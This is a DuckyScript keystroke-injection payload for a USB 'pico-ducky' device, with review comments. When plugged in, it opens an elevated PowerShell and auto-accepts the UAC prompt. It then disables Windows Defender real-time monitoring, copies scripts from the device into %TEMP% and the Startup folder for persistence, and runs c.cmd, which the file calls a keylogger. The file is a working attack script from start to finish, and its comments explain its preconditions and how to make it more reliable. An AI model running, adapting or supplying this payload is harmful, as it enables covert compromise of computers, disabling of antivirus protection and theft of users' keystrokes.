REM created by : C0SM0
REM Windows 10: Disable Windows Defender with Powershell
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM Keystroke-injection (DuckyScript) payload for a CircuitPython "pico-ducky" style
REM device. Every line that is not a REM is typed verbatim into the target, so the
REM statement order and each DELAY are behaviour, not style.
REM
REM What this file does, in order:
REM   1. Opens an elevated PowerShell via the Run box and accepts the UAC prompt.
REM   2. Turns off Defender real-time monitoring with Set-MpPreference.
REM   3. Copies p.ps1, l.ps1 and c.cmd from the device's CIRCUITPY volume into
REM      %TEMP% and the per-user Startup folder, and creates <username>.log in %TEMP%.
REM   4. Runs c.cmd (described below as the keylogger) - twice; see the notes below.
REM The contents of p.ps1 / l.ps1 / c.cmd are NOT part of this file; they live on the
REM device's storage and only their names are visible here.
REM
REM Preconditions this script assumes and never checks:
REM   - The logged-on user is a local administrator, so the UAC dialog is a
REM     consent (yes/no) prompt that ALT y can accept. For a standard user Windows
REM     shows a credential prompt instead, and ALT y most likely does nothing.
REM   - Defender Tamper Protection is off. NOTE(review): with Tamper Protection
REM     enabled, Set-MpPreference -DisableRealtimeMonitoring is not honoured;
REM     confirm on the target build before relying on it.
REM   - The device's mass-storage volume is mounted with the label CIRCUITPY.
REM   - The user profile is under C:\Users\<name> (the paths below hard-code it).
REM
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 2000
REM my best attempt at an elevated powershell instance
REM A non-elevated PowerShell is opened from the Run box and asked to spawn an
REM elevated one (-Verb runAs); the UAC dialog that follows is answered with ALT y.
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 2000
REM Disables real-time monitoring only; cloud-delivered protection, scheduled scans
REM and the other MpPreference switches are left as they were.
REM NOTE(review): this change is itself recorded by Defender (Windows Defender/Operational
REM event log) and, where script-block logging is enabled, by PowerShell - it is not silent.
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
STRING exit
ENTER
REM STAGE1
REM open runbox
REM (There is no STAGE 2 label in this file; the numbering jumps from 1 to 3.)
DELAY 1000
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 300
REM STAGE 3
REM move files to appropriate directories
REM The volume label actually matched below is 'CIRCUITPY' (an earlier version of
REM this comment said 'L'); change it there if your device presents another label.
REM One typed line, ';'-separated, with no error handling: if no CIRCUITPY volume
REM is present, $u is $null, 'cd $u.name' fails, and the cp calls then run from the
REM current directory instead of the device. p.ps1 and l.ps1 go to %TEMP%; c.cmd goes
REM to the per-user Startup folder, so it is re-run at every logon of this user
REM (persistence). The trailing echo creates "<username>.log" in %TEMP%.
REM NOTE(review): $env:APPDATA would give the same Startup path without assuming
REM the profile lives under C:\Users.
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'CIRCUITPY'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\l.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";
ENTER
DELAY 200
REM STAGE 4
REM run keylogger
REM First launch of c.cmd, inside the PowerShell window opened above; that window
REM is left open on the desktop.
STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd
ENTER
DELAY 200
REM open runbox
DELAY 1000
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 300
REM Second launch of c.cmd, from a fresh PowerShell that exits afterwards. Nothing in
REM this file says why it runs twice; unless c.cmd guards against that, this starts
REM two copies. TODO(review): confirm against c.cmd.
STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit
REM STAGE 5
REM deploy
REM The ENTER below submits the STRING typed above; it sits after the STAGE 5 labels
REM in the original, and the order has been kept.
ENTER